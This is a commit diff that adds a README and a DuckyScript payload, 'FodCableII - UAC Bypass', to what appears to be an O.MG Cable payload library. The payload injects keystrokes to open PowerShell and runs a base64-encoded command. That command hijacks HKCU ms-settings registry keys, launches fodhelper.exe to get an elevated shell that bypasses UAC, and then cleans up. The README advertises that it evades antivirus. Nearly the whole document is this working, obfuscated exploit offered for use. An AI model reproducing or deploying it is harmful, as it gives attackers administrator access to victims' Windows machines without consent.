Merge pull request #26 from 0iphor13/master

Uploaded FodCable2

payloads/library/execution/FodCable2 - UAC Bypass/README.md

@@ -0,0 +1,12 @@
+**Title: FodCableII - UAC Bypass**
+
+<p>Author: 0iphor13<br>
+Version: 1.0<br>
+Requirements: OMG Firmware v.2.5 or higher</p>
+
+**What is FodCableII?**
+#
+*Use your O.MG Cable / Plug to bypass UAC using one of the Fodhelper.exe methods.*
+*This POC will get you an elevated powershell instance and won't trigger AV at 04/2022*
+#
+!CleanUp will execute directly after execution!

payloads/library/execution/FodCable2 - UAC Bypass/payload.txt

@@ -0,0 +1,22 @@
+REM       FodCableII
+REM       Version 1.0
+REM       OS: Windows
+REM       Author: 0iphor13
+REM	  Requirements: OMG Firmware v.2.5 or higher
+
+REM       Using FodHelper.exe to bypass UAC and get an elevated shell
+
+DELAY 500
+DUCKY_LANG de
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI
+DELAY 500
+ENTER
+DELAY 500
+STRING powershell.exe -enc JABPAE0ARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBDAFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwALgBvAG0AZwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAvAGQAIAAkAE8ATQBHACAALwBmADsADQAKAHIAZQBnACAAYQBkAGQAIAAiAEgASwBD
+STRING AFUAXABTAG8AZgB0AHcAYQByAGUAXABDAGwAYQBzAHMAZQBzAFwAbQBzAC0AcwBlAHQAdABpAG4AZwBzAFwAQwB1AHIAVgBlAHIAIgAgAC8AZAAgACIALgBvAG0AZwAiACAALwBmADsADQAKAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADMAOwANAAoAcgBlAGcAIABkAGUAbABlAHQAZQAgACIASABLAEMAVQBcAFMAbwBmAHQAdwBh
+STRING AHIAZQBcAEMAbABhAHMAcwBlAHMAXAAuAG8AbQBnAFwAIgAgAC8AZgA7AA0ACgByAGUAZwAgAGQAZQBsAGUAdABlACAAIgBIAEsAQwBVAFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcACIAIAAvAGYAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA7ACAAZQB4AGkAdAA=;exit
+DELAY 200
+ENTER